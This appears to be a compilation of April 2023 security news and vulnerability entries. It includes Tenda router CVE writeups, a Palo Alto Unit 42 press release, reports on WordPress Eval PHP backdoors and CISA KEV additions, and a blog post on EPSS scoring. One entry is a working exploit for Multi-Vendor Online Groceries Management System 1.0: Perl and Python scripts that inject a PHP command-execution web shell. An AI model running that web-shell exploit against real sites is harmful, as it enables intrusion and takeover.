In Tenda AC15 V15.03.05.19, the function GetValue contains a stack-based buffer overflow vulnerability.

Tenda AC15 Unauthorized stack overflow vulnerability

****1\. Affected version:****

US\_AC15V1.0BR\_V15.03.05.19

****2\. Firmware download address****

资料下载\_腾达(Tenda)官方网站

****3\. Vulnerability details****

The function "GetValue" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

范启航 220579866

CVE-2023-30370: Tenda/7.md at main · 2205794866/Tenda

Multi-Vendor Online Groceries Management System version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE)# Date: 4/23/2023# Author: Or4nG.M4n# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: windows## Vuln File : SystemSettings.php < here you can inject php code#     if(isset($_POST['content'])){#      foreach($_POST['content'] as $k => $v)#      file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want#    }# Vuln File : home.php < here you can include and execute you're php code#                   <h3 class="text-center">Welcome</h3>#                   <hr>#                   <div class="welcome-content">#                       <?php include("welcome.html") ?> <=== include #                   </div># Perl Code use LWP::UserAgent;use LWP::Simple;print "Target Url #";my $url = <STDIN>;chomp $url;$backdoor = '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'; my $ua       = LWP::UserAgent->new();my $response = $ua->post( $url."/classes/SystemSettings.php?f=update_settings", { 'content[welcome]' => $backdoor } );my $content  = $response->decoded_content();print "[+] injection in welcome page\n";print "[+] backdoor url ".$url."/?cmd=ls -al";# Python Codeimport requests url = input("Enter url :")postdata = {'content[welcome]':'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'}resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata)print("[+] injection in welcome page")print("[+]"+url+"/?cmd=ls -al")print("\n")

Multi-Vendor Online Groceries Management System 1.0 Remote Code Execution

Tenda AC15 V15.03.05.19 is vulnerable to Buffer Overflow.

Tenda AC15 Unauthorized stack overflow vulnerability

****1\. Affected version:****

US\_AC15V1.0BR\_V15.03.05.19

****2\. Firmware download address****

资料下载\_腾达(Tenda)官方网站

****3\. Vulnerability details****

The function "sub\_E2F4" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

范启航 220579866

CVE-2023-30369: Tenda/3.md at main · 2205794866/Tenda

Tenda AC5 V15.03.06.28 is vulnerable to Buffer Overflow via the initWebs function.

Tenda AC5 Unauthorized stack overflow vulnerability

****1\. Affected version:****

US\_AC5V1.0RTL\_V15.03.06.28

****2\. Firmware download address****

资料下载\_腾达(Tenda)官方网站

****3\. Vulnerability details****

The function "initWebs" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

Due to legal and policy reasons, we are unable to provide the exploit for this vulnerability at this time.

**5\. Author**

范启航 220579866

CVE-2023-30368: Tenda/1.md at main · 2205794866/Tenda

With 60% of organizations taking more than four days to resolve cybersecurity issues, Unit 42’s Global Incident Response Service dramatically reduces time to remediate threats.

**SANTA CLARA, Calif., April 24, 2023 –** Palo Alto Networks (NASDAQ: PANW), the global cybersecurity leader, today announced the expansion of its Unit 42 Digital Forensics and Incident Response Service. The Global Digital Forensics and Incident Response service combines depth of incident response experience with the breadth of AI-powered solutions, including Cortex® XDR® and XpanseTM, and Prisma® Cloud, to equip enterprises to respond immediately and recover faster than most any digital forensics and incident response (DFIR) service in the market.

To help organizations better respond to complex threats, Palo Alto Networks’ unique knowledge of security and a deep understanding of advanced attacker behavior enables Unit 42 to undertake a rigorous investigation with rapid response. According to Wendi Whitmore, senior vice president of Palo Alto Networks Unit 42, “No other security vendor in the industry can match Palo Alto Networks’ telemetry or our breadth of products to stop attacks in real-time. We analyze data from thousands of customers globally, generating over 500 billion daily events. This massive dataset enables responders to contextualize threats and respond effectively. Coupled with our expertise in cloud threats, SOC automation, and network security, this advanced intelligence helps companies recover and emerge stronger than before.”

Unit 42 specializes in cyber DFIR and responds to thousands of customer events annually from ransomware incidents to the rising cloud attacks. Backed by a global team of incident responders, threat intelligence experts, and consultants, Unit 42 has handled some of the largest data breaches in history.

According to the recent Unit 42 Cloud Threat report, more than 60% of organizations take over four days to resolve security issues, while threat actors typically exploit a misconfiguration or vulnerability within hours. Unit 42 recently engaged with a large enterprise customer after a zero-day vulnerability allowed an authentication bypass and remote code execution (RCE) exploit. The threat actor leveraged the vulnerability to drop web shells and launch a crypto miner onto the client's unpatched CRM system hosted on a popular cloud service provider (CSP). Through unauthorized access, the threat actor stole a CSP credential that provided access to sensitive databases, which they made publicly available on the Internet. As part of the investigation, Unit 42 leveraged Cortex XDR to ingest the CSP CloudTrail logs for rapid threat hunting and analysis and Prisma Cloud to assess the client's CSP environment. Using Prisma Cloud, Unit 42 assisted the client in remediating the CSP misconfigurations and implementing security best practices during the incident, in real-time, improving their security posture overall.

**The Unit 42 Digital Forensics and Incident Response Service includes:**

*   Assessments: To evaluate and test controls against real-world threats proactively, Unit 42 offers many assessments, including compromise assessments, ransomware readiness assessments, attack surface assessments, and more. 
*   IR Preparedness: Helping organizations pressure test technical controls, network security, response playbooks, and more. Services include Penetration Testing, Purple Teaming and Tabletop exercises. 
*   Incident Response: Quickly jumpstart an intelligence-led investigation, deploying Palo Alto Networks tools within minutes to contain threats and gather the evidence needed to analyze an incident fully. Unit 42 IR services include cloud incident response, expert malware analysis, and ransomware investigation. 
*   Managed Threat Hunting: Offers round-the-clock monitoring from Unit 42 experts to discover attacks anywhere in an organization. Threat hunters work on an organization’s behalf to discover advanced threats, such as state-sponsored attackers, cybercriminals, malicious insiders, and malware. 
*    Managed Detection and Response: Combines Cortex XDR with Unit 42's industry-leading threat intelligence to offer continuous 24/7 threat detection, investigation and response.

In the Forrester Wave™: Cybersecurity Incident Response Services, Q1 2022 Forrester noted that organizations “…seeking support in preparing for and responding to incidents in sprawling cloud environments should look at Palo Alto Networks.” 

**About Unit 42** 

Palo Alto Networks Unit 42 brings together world-renowned threat researchers, elite incident responders, and expert security consultants to create an intelligence-driven, response-ready organization passionate about helping you proactively manage cyber risk. Together, our team serves as your trusted advisor to help assess and test your security controls against the right threats, transform your security strategy with a threat-informed approach, and respond to incidents in record time so that you get back to business faster. 

Approved by Cybersecurity Insurance Plans Unit 42 is on the approved vendor panel of more than 70 major cybersecurity insurance carriers. If you need to use Unit 42 services in connection with a cyber insurance claim, Unit 42 can honor any applicable preferred panel rate in place with the insurance carrier. For the panel rate to apply, just inform Unit 42 at the time of the request for service. 

Under Attack? Get in touch with the Unit 42 Incident Response team at start.paloaltonetworks.com/contact-unit42.html or call North America Toll-Free: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, UK: +44.20.3743.3660, APAC: +65.6983.8730, or Japan: +81.50.1790.0200. 

Follow Palo Alto Networks on Twitter, LinkedIn, Facebook and Instagram. 

**About Palo Alto Networks** 

Palo Alto Networks is the world’s cybersecurity leader. We innovate to outpace cyberthreats, so organizations can embrace technology with confidence. We provide next-gen cybersecurity to thousands of customers globally, across all sectors. Our best-in-class cybersecurity platforms and services are backed by industry-leading threat intelligence and strengthened by state-of-the-art automation. Whether deploying our products to enable the Zero Trust Enterprise, responding to a security incident, or partnering to deliver better security outcomes through a world-class partner ecosystem, we’re committed to helping ensure each day is safer than the one before. It’s what makes us the cybersecurity partner of choice. 

At Palo Alto Networks, we’re committed to bringing together the very best people in service of our mission, so we’re also proud to be the cybersecurity workplace of choice, recognized among Newsweek’s Most Loved Workplaces (2021 and 2022), Comparably Best Companies for Diversity (2021), and HRC Best Places for LGBTQ Equality (2022). For more information, visit www.paloaltonetworks.com. 

Palo Alto Networks, Cortex, Cortex XDR, Cortex Xpanse, Prisma Cloud, Unit 42 and the Palo Alto Networks logo are trademarks of Palo Alto Networks, Inc. in the United States and in jurisdictions throughout the world. All other trademarks, trade names, or service marks used or mentioned herein belong to their respective owners. Any unreleased services or features (and any services or features not generally available to customers) referenced in this or other press releases or public statements are not currently available (or are not yet generally available to customers) and may not be delivered when expected or at all. Customers who purchase Palo Alto Networks applications should make their purchase decisions based on services and features currently generally available.

Palo Alto Networks Takes Aim At Cyberattacks With the Expansion of Unit 42's Digital Forensics & Incident Response Service Globally

Threat actors have been observed leveraging a legitimate but outdated WordPress plugin to surreptitiously backdoor websites as part of an ongoing campaign, Sucuri revealed in a report published last week.
The plugin in question is Eval PHP, released by a developer named flashpixx. It allows users to insert PHP code pages and posts of WordPress sites that's then executed every time the posts are

Server Security / WordPress

Threat actors have been observed leveraging a legitimate but outdated WordPress plugin to surreptitiously backdoor websites as part of an ongoing campaign, Sucuri revealed in a report published last week.

The plugin in question is Eval PHP, released by a developer named flashpixx. It allows users to insert PHP code pages and posts of WordPress sites that's then executed every time the posts are opened in a web browser.

While Eval PHP has never received an update in 11 years, statistics gathered by WordPress show that it's installed on over 8,000 websites, with the number of downloads skyrocketing from one or two on average since September 2022 to 6,988 on March 30, 2023.

On April 23, 2023, alone, it was downloaded 2,140 times. The plugin has racked up 23,110 downloads over the past seven days.

GoDaddy-owned Sucuri said it observed some infected websites' databases injected with malicious code into the "wp\_posts" table, which stores a site's posts, pages, and navigation menu information. The requests originate from these three IP addresses based in Russia.

"This code is quite simple: It uses the file\_put\_contents function to create a PHP script into the docroot of the website with the specified remote code execution backdoor," security researcher Ben Martin said.

"Although the injection in question does drop a conventional backdoor into the file structure, the combination of a legitimate plugin and a backdoor dropper in a WordPress post allows them to easily reinfect the website and stay hidden. All the attacker needs to do is to visit one of the infected posts or pages and the backdoor will be injected into the file structure."

Sucuri said it detected over 6,000 instances of this backdoor in the last 6 months alone, describing the pattern of inserting the malware directly into the database as a "new and interesting development."

The attack chain entails installing the Eval PHP plugin on compromised sites and misusing it to establish persistent backdoors across multiple posts that are sometimes also saved as drafts.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

"The way the Eval PHP plugin works it's enough to save a page as a draft in order to execute the PHP code inside the \[evalphp\] shortcodes," Martin explained, adding the rogue pages are created with a real site administrator as their author, suggesting the attackers were able to successfully sign in as a privileged user.

The development once again points to how malicious actors are experimenting with different methods to maintain their foothold in compromised environments and evade server-side scans and file integrity monitoring.

Site owners are advised to secure the WP Admin dashboard as well as watch out for any suspicious logins to prevent threat actors from gaining admin access and install the plugin.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Exploit Outdated WordPress Plugin to Backdoor Thousands of WordPress Sites

Hello everyone! This episode and will be about latest news in my Vulristics project. EPSS v3 The third iteration of the Exploit Prediction Scoring System (EPSS) was released in March. It is stated that EPSS has become 82% better. There is a pretty cool and detailed article about the changes. For example, EPSS Team began to analyze not 16 parameters […]

Hello everyone! This episode and will be about latest news in my Vulristics project.

The third iteration of the Exploit Prediction Scoring System (EPSS) was released in March. It is stated that EPSS has become 82% better. There is a pretty cool and detailed article about the changes. For example, EPSS Team began to analyze not 16 parameters of vulnerabilities, but 1164. I have a suspicion that most of these properties are vendor labels, as in the table.

But trying to figure out how it actually works is not very promising. After all, this is the output of some neural network. So there is no algorithm there. In terms of complexity and incomprehensibility, this is already similar to Tenable VPR. But the fact that EPSS is available for free redeems everything. 😇 By the way, the article mentions Tenable VPR and other commercial scores and criticizes them for their proprietary nature, public inaccessibility, and the fact that these scores are partly based on expert opinion, and not just on data.

I have looked at the EPSS values for some CVEs:

1.  For a MS Word RCE vulnerability (CVE-2023-21716) with a recent PoC, EPSS is very high (0.16846,**0.95168**).
2.  For SPNEGO (CVE-2022-37958), for which a public exploit should appear in Q2, EPSS is also high (0.07896,**0.93195**).
3.  For a random MS Edge vulnerability (CVE-2023-0696) from February MS Patch Tuesday (there are dozens of them every month), EPSS is low (0.00062,**0.24659**)
4.  I took a vulnerability with high EPSS – CVE-2023-0297 (0.04128,**0.90834)**. It is also clear why, there is a link to the exploit directly in NVD.

At first glance, everything is quite adequate. 👍

I wouldn’t recommend prioritizing vulnerabilities solely based on EPSS. But using it as an additional factor with the same weight as the CVSS Base Score (and possibly higher) can be quite good. This value is unlikely to rise up for no reason at all. If it goes to 0.9 and above, it makes sense to take a closer look at the vulnerability.

**EPSS v3 Support in Vulristics**

I have added support for EPSS data in Vulristics. EPSS has become another data source, so the command to analyze a set of CVE identifiers will look like this:

$ python3 vulristics.py --report-type "cve\_list" --cve-project-name "New Project" --cve-list-path "analyze\_cve\_list.txt" --cve-comments-path "analyze\_cve\_comments.txt" --cve-data-sources "ms,nvd,epss,vulners,attackerkb" --rewrite-flag "True"

Adding a new source is not a difficult task. I did it by analogy with NVD. However, the question arose: which value of EPSS to use. There were 2 options:

1.  **Probability** – “probability of observing exploitation activity in the next 30 days”.
2.  **Percentile** – a value indicating how many CVE vulnerabilities has a lower probability to be observed exploited, than this particular CVE vulnerability. “For example, an EPSS probability of just 0.10 (10%) rests at about the 88th percentile — meaning that 88% of all CVEs are scored lower”.

I’ve come to the conclusion that the **Probability** values are too small and differ little from each other, so it’s better to use **Percentile**.

I updated the report for the April MS Patch Tuesday.

1.  Old report without EPSS
2.  New report with EPSS

It looks good enough, but with some oddities.

The most critical vulnerability Elevation of Privilege – Windows Common Log File System Driver (CVE-2023-28252), which is present in CISA KEV, has a very low EPSS for some reason. 🤷‍♂️ Therefore, the result of some ML analysis is, of course, good, but do not lose common sense. 😉

**Vulristics integration into Cloud Advisor**

Cloud Advisor uses Vulristics to prioritize vulnerabilities. A great example of how my open source project can be integrated into a commercial product. 🙂 In this case, into a Cloud Security Posture Management (CSPM) solution. Vulristics is released under the MIT license, so it can be freely used in any way: as a utility, as individual functions, as a methodology and algorithms for calculating the criticality of vulnerabilities. There are no requirements to open your derived code or anything like that.

Here is an excerpt from the press release about the new vulnerability management feature in Cloud Advisor:

_“Additionally, the algorithms of the_ Vulristics _tool are utilized for prioritization while taking into account a number of variables, such as the type of vulnerability, the CVSS score and the existence of a public exploit. This enables you to concentrate your efforts on fixing the vulnerabilities that actually pose a threat to your infrastructure.”_If you have a large cloud infrastructure and don’t know how to control its security, take a look at Cloud Advisor. By the way, this company was created by the founders of Agnitum, the vendor of the Agnitum Outpost personal firewall popular in the ’00s – I used it very actively. 🙂 They are very reasonable and skilled guys.

Hi! My name is Alexander and I am a Vulnerability Management specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

А всех русскоязычных я приглашаю в ещё один телеграмм канал @avleonovrus, первым делом теперь пишу туда.

Vulristics News: EPSS v3 Support, Integration into Cloud Advisor

A vulnerability, which was classified as problematic, has been found in kalcaddle KodExplorer up to 4.49. Affected by this issue is some unknown functionality. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.50 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-227000.

**KodExplorer 4.49 - Cross-site Request Forgery (CSRF) to Remote Code Execution (RCE)****Summary**

KodExplorer version 4.49 or earlier contains a vulnerability that has been rated critical. The vulnerability allows a malicious user to trick the target into clicking on a malicious link, which will result in a malicious file being uploaded to the target's server. The attack is based on Cross-site Request Forgery and depends on target interaction for it to be successfully executed.

**Affected Product**

KodExplorer v4.49 and earlier

**Severity Level**

9.0 (Critical)  
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

**Steps to Reproduce**

Please provide some email address so that the proof of concept can be sent.

**Mitigation**

Considering that it is a CSRF-based flaw, it is recommended that there is functionality to block these types of attacks, such as an anti-CSRF token.

CVE-2022-4944: Vulnerability: Cross-site Request Forgery (CSRF) to Remote Code Execution (RCE) · Issue #512 · kalcaddle/KodExplorer

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The three vulnerabilities are as follows -

CVE-2023-28432 (CVSS score - 7.5) - MinIO Information Disclosure Vulnerability 
CVE-2023-27350 (CVSS score - 9.8) - PaperCut MF/NG Improper Access Control

Patch Management / Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

The three vulnerabilities are as follows -

*   **CVE-2023-28432** (CVSS score - 7.5) - MinIO Information Disclosure Vulnerability
*   **CVE-2023-27350** (CVSS score - 9.8) - PaperCut MF/NG Improper Access Control Vulnerability
*   **CVE-2023-2136** (CVSS score - TBD) - Google Chrome Skia Integer Overflow Vulnerability

"In a cluster deployment, MinIO returns all environment variables, including MINIO\_SECRET\_KEY and MINIO\_ROOT\_PASSWORD, resulting in information disclosure," MinIO maintainers said in an advisory published on March 21, 2023.

Data gathered by GreyNoise shows that as many as 18 unique malicious IP addresses from the U.S., the Netherlands, France, Japan, and Finland have attempted to exploit the flaw over the past 30 days.

The threat intelligence company, in an alert published late last month, also noted how a reference implementation provided by OpenAI for developers to integrate their plugins to ChatGPT relied on an older version of MinIO that's vulnerable to CVE-2023-28432.

"While the new feature released by OpenAI is a valuable tool for developers who want to access live data from various providers in their ChatGPT integration, security should remain a core design principle," GreyNoise said.

Also added to the KEV catalog is a critical remote code execution bug affecting PaperCut print management software that allows remote attackers to bypass authentication and run arbitrary code.

The vulnerability has been addressed by the vendor as of March 8, 2023, with the release of PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11, and 22.0.9. Zero Day Initiative, which reported the issue on January 10, 2023, is expected to release additional technical details on May 10, 2023.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

According to an update shared by the Melbourne-based company earlier this week, evidence of active exploitation of unpatched servers emerged in the wild around April 18, 2023.

Cybersecurity firm Arctic Wolf said it "has observed intrusion activity associated with a vulnerable PaperCut Server where the RMM tool Synchro MSP was loaded onto a victim system."

Lastly added to the list of actively exploited flaws is a Google Chrome vulnerability affecting the Skia 2D graphics library that could enable a threat actor to perform a sandbox escape via a crafted HTML page.

Federal Civilian Executive Branch (FCEB) agencies in the U.S. are recommended to remediate identified vulnerabilities by May 12, 2023, to secure their networks against active threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Adds 3 Actively Exploited Flaws to KEV Catalog, including Critical PaperCut Bug

PowerJob V4.3.1 is vulnerable to Incorrect Access Control that allows for remote code execution.

**PowerJob vulnerable to incorrect access control**

Moderate severity GitHub Reviewed Published Apr 21, 2023 to the GitHub Advisory Database • Updated Apr 24, 2023

Tag

#rce